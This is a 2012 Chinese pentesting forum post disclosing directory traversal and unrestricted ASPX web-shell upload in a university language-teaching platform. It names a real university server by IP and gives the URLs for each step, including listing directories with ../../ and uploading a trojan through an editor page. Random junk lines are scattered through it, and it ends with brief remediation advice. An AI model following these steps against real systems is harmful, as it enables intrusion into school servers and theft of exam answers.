中国网络渗透测试联盟
标题:
新理念外语网络教学平台文件上传漏洞
[打印本页]
作者:
admin
时间:
2012-12-4 11:10
标题:
新理念外语网络教学平台文件上传漏洞
好多大学都在用这个教学平台,这个漏洞会导致直接拿到试题答案,甚至作为跳板继续渗透进入学校其他服务器中
3 h* D' X' t8 t, \/ t% i
& A2 G# Q9 g( E5 r( ^4 S7 O
详细说明:
+ Y$ v5 a$ p! |2 G3 D; z
5 u7 t5 d5 ]9 [& ^5 ^! t) a
以南开大学的为例:
, x8 I$ T2 P/ [, }5 F" a
http://222.30.60.3/NPELS
0 X1 S |) I. w: F$ S; ]! ], s& ^+ {
NPELS_LearningCenter_5.0 客户端下的 Update.exe.config 文件泄露一个重要地址
/ H6 X U- r' ~
<setting name="Update_CommonSvr_CommonService" serializeAs="String">
9 H% w3 j: r1 B5 d3 S
<value>http://222.30.60.3/NPELS/CommonService.asmx</value>
) g! H- U/ |7 w. Z! k5 U: r
</setting>
! e; u3 G: b- E
及版本号
6 f& r' m2 F9 x, p6 e4 [, U
<add key="TVersion" value="1, 0, 0, 2187">
8 b/ _, s. F+ j1 K
</add>
' c" W4 L7 `8 q7 `
直接访问
" V/ Q8 j1 s; d# m* n- g
http://222.30.60.3/NPELS/CommonService.asmx
) n+ C- Y1 v5 S' v' C; _
使用GetTestClientFileList操作,直接 HTTP GET 列目录:
7 R q- y; ~9 o
http://222.30.60.3/NPELS/CommonS ... tFileList?version=1
, 0, 0, 2187
8 V, n; R( \+ {& }" `# ?
进一步列目录(返回的网页很大,可以直接 wget 下来)
# L* n7 C, F" \8 `! [
http://222.30.60.3/NPELS/CommonS ... List?version=../../
' S8 `5 X) }) V$ r, s1 y! D K' n
& {) J2 i; z: @% Q) V I" \# e
发现
& T U( n7 ]8 l* X. J3 \3 F3 G2 f& ]
http://zzxx.nankai.edu.cn/npelsv/editor/editor.htm
( I9 l: ^; P# g8 \( c ^
可以上传,直接上传aspx木马即可,不需要改后缀名或者文件头
( B9 U: u2 r6 q' g. [
上传后继续列目录找到木马地址直接访问即可
$ b2 v2 T& N: H: i y* ~
! ~! _+ } ]8 N$ e) ]/ O
OOXX
, X4 y" i* e3 o; _
1 V5 g$ O0 t& `6 T1 M! M
Google "新理念外语网络教学平台" 测试了几个其他的站,都有类似的列目录上传方法
) V5 z' B, C6 \* \: a# t
漏洞证明:
. y! f. \5 u7 N; V5 j& r9 f. M
- I( Y) D# V" m/ T: x
列目录:
; a, x+ l- I9 G" F$ Z9 h* m
http://222.30.60.3/NPELS/CommonS ... List?version=../../
5 Y% W+ i$ V: I4 C
文件上传:
2 ~6 c1 q$ a7 q: {, S' Q" \
http://222.30.60.3/npelsv/editor/editor.htm
/ l$ ]2 m: W1 z' U* s( ^* c9 \# U! \
2 {: d; G1 q/ g
上传木马:
# n* t5 O+ f8 k. V& ?6 v
http://222.30.60.3/npelsv/editor/uploadfiles/1.aspx
* k, q4 A$ s& b
9 _5 S: |. y# c$ F9 R: a5 l
修复方案:
2 x& v4 e( ~8 I" p' Y
好像考试系统必须使用 CommonService.asmx
C& @1 z# X) F1 m
最好配置文件加密或者用别的方式不让它泄露出来
! F& s$ q/ [( Z9 ~
并且检查或删除各上传入口,像
http://222.30.60.3/NPELS/Upload.aspx
一样
$ ~. F* L0 }( p2 v
欢迎光临 中国网络渗透测试联盟 (https://cobjon.com/)
Powered by Discuz! X3.2